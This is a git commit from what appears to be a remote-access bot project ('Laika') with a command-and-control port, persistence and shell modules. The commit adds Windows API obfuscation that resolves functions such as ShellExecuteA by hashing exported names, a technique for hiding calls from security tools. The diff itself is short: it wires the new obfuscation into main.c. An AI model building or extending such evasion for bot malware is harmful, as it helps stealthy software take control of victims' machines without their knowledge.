Bot: Added boilerplate windows API obfuscation

- Grabs the functions directly from the loaded library by walking the exported address table and comparing hashes - For now, only ShellExecuteA has been setup, more to come
2026-03-20 17:00:03 +00:00 · 2022-07-07 23:23:39 -05:00
parent 18a6fdd124
commit b2f8efc402
6 changed files with 166 additions and 2 deletions
--- a/bot/src/main.c
+++ b/bot/src/main.c
@@ -3,6 +3,7 @@
 #include "lconfig.h"
 #include "lerror.h"
 #include "ltask.h"
+#include "obf.h"
 #include "persist.h"
 #include "shell.h"

@@ -27,6 +28,9 @@ int main()
    LAIKA_BOX_SKID_START(char *, cncPORT, LAIKA_CNC_PORT);
    struct sLaika_bot *bot;

+    /* init API obfuscation (windows only) */
+    laikaO_init();
+
 #ifdef LAIKA_PERSISTENCE
    laikaB_markRunning();